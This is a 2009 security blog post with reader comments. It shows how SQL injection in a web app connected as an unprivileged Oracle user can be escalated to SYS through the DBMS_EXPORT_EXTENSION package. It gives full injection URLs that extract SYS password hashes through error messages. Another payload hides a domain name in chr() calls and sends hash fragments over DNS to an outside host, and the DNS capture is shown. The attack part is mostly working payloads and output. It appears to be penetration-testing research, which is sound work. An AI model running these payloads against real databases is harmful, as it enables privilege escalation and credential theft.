Oracle privilege escalations from web app

April 26, 2009

There are a number of privilege escalation attacks known for oracle. These are mainly because by default PL/SQL procedures and functions run with the privilege of the definer and not that of invoker. Think of it like SUID files.

Now, for some reason i was under the impression that these privilege escalations will not be possible through sql injection in web apps. Thats because mostly sql injection occurs in “Select” query and to carry out privilege escalation you need to finish the original statement and then generally write some PL/SQL code and execute it. This requires the web API to support batched query. To the best of my knowledge mostly Web APIs do not support it. Hence, it seemed we would be restricted to extract data with the privileges of the user with which application is connecting to the database.

Alexander told me some attack vectors through which we can execute PL/SQL code without needing the batched query. He has written a small tutorial for this.
The tutorial is still not finished but it gives you a good idea of how to achieve this. While, i still haven’t succeeded in executing O.S commands, i thought i will share the privilege escalation vector:

SQL> select user from dual;

USER
——————————
SCOTT

so, i connect to oracle as user scott and i don’t have privileges to select from sys.user$

SQL> select name, password from sys.user$;
select name, password from sys.user$
*
ERROR at line 1:
ORA-00942: table or view does not exist

Now, i will exploit a web app with sql injection which connects to database as unprivileged user(scott). here i am extracting data with oracle error messages (remember utl_inaddr.get_host_name):

http://192.168.5.109:81/ora2.php?name=-1 and utl_inaddr.get_host_name((select user from dual)) is not null —

and you get an error:
ORA-29257: host SCOTT unknown ORA-06512: at "SYS.UTL_INADDR", line 4 ORA-06512:

Next, lets try if we can select from sys.user$

http://192.168.5.109:81/ora2.php?name=-1%20and%20utl_inaddr.get_host_name((select%20name||
password%20from%20sys.user$ where rownum=1))%20is%20not%20null%20–

and you get an error similar to what we got earlier:
ORA-00942: table or view does not exist

Oracle’s dbms_export_extension package could be used to execute a block of anonymous Pl/SQL and as it is owned by SYS and executable by PUBLIC, we can use this to execute PL/SQL as SYS user.

So, as per alexander’s example, now we inject this:

http://192.168.5.109:81/ora2.php?name=-1%20
and%20%20chr(44)=SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT%22.PUT(:P1);EXECUTE%20IMMEDIATE%20''DECLARE%20PRAGMA%20AUTONOMOUS_TRANSACTION;
BEGIN%20EXECUTE%20IMMEDIATE%20''''%20select%20user%20from%20dual%20where%20utl_inaddr.get_host_name((select%20name||chr(44)||password%20from%20sys.user$%20where%20rownum=1))%20is%20not%20null'''';END;'';END;--','SYS',0,'1',0)

and you get an error:
ORA-29257: host SYS,286E1EA8F2CFD262 unknown ORA-06512:

So, you have the password hashes..:)

If you like extracting data over dns, here is an example:

http://192.168.5.109:81/ora2.php?name=-1 and chr(44)=SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' select user from dual where utl_inaddr.get_host_address((select substr(password,1,10)||chr(46)||chr(116)||chr(101)||chr(115)||chr(116)||chr(46)||chr(110)||chr(111)||chr(116)||chr(115)||chr(111)||chr(115)||chr(101)||chr(99)||chr(117)||chr(114)||chr(101)||chr(46)||chr(99)||chr(111)||chr(109) from sys.user$ where rownum=1)) is not null'''';END;'';END;--','SYS',0,'1',0)


You will see name query like this:
16:37:42.734252 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 90) y.y.y.y.53 > x.x.x.x: 37980*- q: A? 2CFD262.test.notsosecure.com. 1/0/0 2CFD262.test.notsosecure.com.

Alexander will soon update his tutorial and we should be able to execute Operating system commands through web apps.

For more details also refer to page 72 of the “Oracle Hacker’s Handbook”.
———————–
Advert: Testking provide best quality 1Y0-259 questions and 1Y0-A05 answers to practice and pass 70-685 exam on first dive.

Comments

3 Comments

  • CG says:

    did you just forget to paste something or did the SYS hash come back in two requests? I only see half of the hash in your example.

  • sid says:

    i think you are talking about OOB

    “16:37:42.734252 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 90) y.y.y.y.53 > x.x.x.x: 37980*- q: A? 2CFD262.test.notsosecure.com. 1/0/0 2CFD262.test.notsosecure.com.”

    I used a substring function, for some reason the whole hash wasn’t coming over DNS, so i thought i will extract it 2 requests.

    select substr(password,1,10)…

Leave a Reply

Your email address will not be published. Required fields are marked *

Trackback